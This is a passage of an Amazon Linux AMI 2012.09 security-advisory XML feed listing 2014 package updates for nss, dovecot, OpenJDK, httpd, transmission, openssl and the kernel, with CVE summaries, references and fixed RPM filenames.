version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-385</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-385: critical priority package update for nss</title><issued date="2014-07-23 14:08:00" /><updated date="2014-09-19 11:38:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1544:
Use-after-free vulnerability in the CERT_DestroyCertificate function in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird before 24.7, allows remote attackers to execute arbitrary code via vectors that trigger certain improper removal of an NSSCertificate structure from a trust domain.
1116198:
CVE-2014-1544 nss: Race-condition in certificate verification can lead to Remote code execution (MFSA 2014-63)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1544" title="" id="CVE-2014-1544" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-tools" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss" version="3.16.0" release="1.36.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.16.0-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-386</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-386: medium priority package update for dovecot</title><issued date="2014-07-23 14:09:00" /><updated date="2014-09-19 11:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3430:
Dovecot 1.1 before 2.2.13 and dovecot-ee before 2.1.7.7 and 2.2.x before 2.2.12.12 does not properly close old connections, which allows remote attackers to cause a denial of service (resource consumption) via an incomplete SSL/TLS handshake for an IMAP/POP3 connection.
1096402:
CVE-2014-3430 dovecot: denial of service through maxxing out SSL connections
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3430" title="" id="CVE-2014-3430" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dovecot-debuginfo" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-debuginfo-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-pigeonhole" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pigeonhole-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-devel-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-pgsql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pgsql-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-mysql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-mysql-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-pigeonhole" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pigeonhole-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-devel" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-devel-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-debuginfo" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-debuginfo-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-mysql" version="2.0.9" 
release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-mysql-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-pgsql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pgsql-2.0.9-7.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-387</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-387: important priority package update for java-1.6.0-openjdk</title><issued date="2014-07-31 13:52:00" /><updated date="2014-09-19 11:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4266:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4263:
The Diffie-Hellman (DH) key exchange algorithm implementation in the Security component in OpenJDK failed to validate public DH parameters properly. This could cause OpenJDK to accept and use weak parameters, allowing an attacker to recover the negotiated key.
CVE-2014-4262:
An improper permission check issue was discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2014-4252:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4244:
It was discovered that the RSA algorithm in the Security component in OpenJDK did not sufficiently perform blinding while performing operations that were using private keys. An attacker able to measure timing differences of those operations could possibly leak information about the used keys.
CVE-2014-4219:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4218:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4216:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4209:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2490:
A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2490" title="" id="CVE-2014-2490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4209" title="" id="CVE-2014-4209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4216" title="" id="CVE-2014-4216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4218" title="" id="CVE-2014-4218" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4219" title="" id="CVE-2014-4219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4244" title="" id="CVE-2014-4244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4252" title="" id="CVE-2014-4252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4262" title="" id="CVE-2014-4262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4263" title="" id="CVE-2014-4263" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4266" title="" id="CVE-2014-4266" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0907.html" title="" id="RHSA-2014:0907" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-388</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-388: important priority package update for httpd</title><issued date="2014-07-31 13:54:00" /><updated date="2014-09-19 11:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0231:
A denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely.
CVE-2014-0226:
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user.
CVE-2014-0118:
A denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the "DEFLATE" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118" title="" id="CVE-2014-0118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226" title="" id="CVE-2014-0226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231" title="" id="CVE-2014-0231" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0920.html" title="" id="RHSA-2014:0920" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-tools" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.27" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.27-1.3.amzn1.noarch.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.3.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.27" release="1.3.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.3.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.27-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-389</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-389: important priority package update for httpd24</title><issued date="2014-07-31 13:56:00" /><updated date="2014-09-19 11:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0231:
A denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely.
1120596:
CVE-2014-0231 httpd: mod_cgid denial of service
CVE-2014-0226:
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user.
1120603:
CVE-2014-0226 httpd: mod_status heap-based buffer overflow
CVE-2014-0118:
A denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the "DEFLATE" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.
1120601:
CVE-2014-0118 httpd: mod_deflate denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118" title="" id="CVE-2014-0118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226" title="" id="CVE-2014-0226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231" title="" id="CVE-2014-0231" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.10" release="1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.10" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.10-1.59.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="1.59.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/mod24_ssl-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.10" release="1.59.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="1.59.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.10-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-390</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-390: medium priority package update for transmission</title><issued date="2014-07-31 14:00:00" /><updated date="2014-09-19 11:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4909:
Integer overflow in the tr_bitfieldEnsureNthBitAlloced function in bitfield.c in Transmission before 2.84 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted peer message, which triggers an out-of-bounds write.
1118290:
CVE-2014-4909 transmission: peer communication vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4909" title="" id="CVE-2014-4909" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transmission-common" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-common-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-daemon" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-daemon-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-debuginfo-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-cli-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-cli-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission-daemon" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-daemon-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission-common" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-common-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission-debuginfo" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-debuginfo-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission" version="2.84" release="1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/transmission-2.84-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-391</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-391: medium priority package update for openssl</title><issued date="2014-08-07 12:26:00" /><updated date="2014-09-19 11:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5139:
1127491:
CVE-2014-5139 openssl: crash with SRP ciphersuite in Server Hello message
CVE-2014-3512:
1127505:
CVE-2014-3512 openssl: SRP buffer overrun
CVE-2014-3511:
1127504:
CVE-2014-3511 openssl: TLS protocol downgrade attack
CVE-2014-3510:
1127503:
CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service
CVE-2014-3509:
1127498:
CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext
CVE-2014-3508:
1127490:
CVE-2014-3508 openssl: information leak in pretty printing functions
CVE-2014-3507:
1127502:
CVE-2014-3507 openssl: DTLS memory leak from zero-length fragments
CVE-2014-3506:
1127500:
CVE-2014-3506 openssl: DTLS memory exhaustion
CVE-2014-3505:
1127499:
CVE-2014-3505 openssl: DTLS packet processing double free
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505" title="" id="CVE-2014-3505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506" title="" id="CVE-2014-3506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507" title="" id="CVE-2014-3507" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508" title="" id="CVE-2014-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509" title="" id="CVE-2014-3509" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510" title="" id="CVE-2014-3510" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511" title="" id="CVE-2014-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512" title="" id="CVE-2014-3512" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139" title="" id="CVE-2014-5139" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.78.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/openssl-perl-1.0.1i-1.78.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1i-1.78.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1i" release="1.78.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1i-1.78.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-392</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-392: medium priority package update for kernel</title><issued date="2014-08-21 11:03:00" /><updated date="2014-09-19 11:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3153:
The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.
A flaw was found in the way the Linux kernel's futex subsystem handled the requeuing of certain Priority Inheritance (PI) futexes. A local, unprivileged user could use this flaw to escalate their privileges on the system.
1103626:
CVE-2014-3153 kernel: futex: pi futexes requeue issue
CVE-2014-1739:
The media_device_enum_entities function in drivers/media/media-device.c in the Linux kernel before 3.14.6 does not initialize a certain data structure, which allows local users to obtain sensitive information from kernel memory by leveraging /dev/media0 read access for a MEDIA_IOC_ENUM_ENTITIES ioctl call.
1109774:
CVE-2014-1739 Kernel: drivers: media: an information leakage
CVE-2014-0196:
The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.
1094232:
CVE-2014-0196 kernel: pty layer race condition leading to memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0196" title="" id="CVE-2014-0196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739" title="" id="CVE-2014-1739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153" title="" id="CVE-2014-3153" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.53" release="56.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.53-56.140.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.53" release="56.140.amzn1" epoch="0" 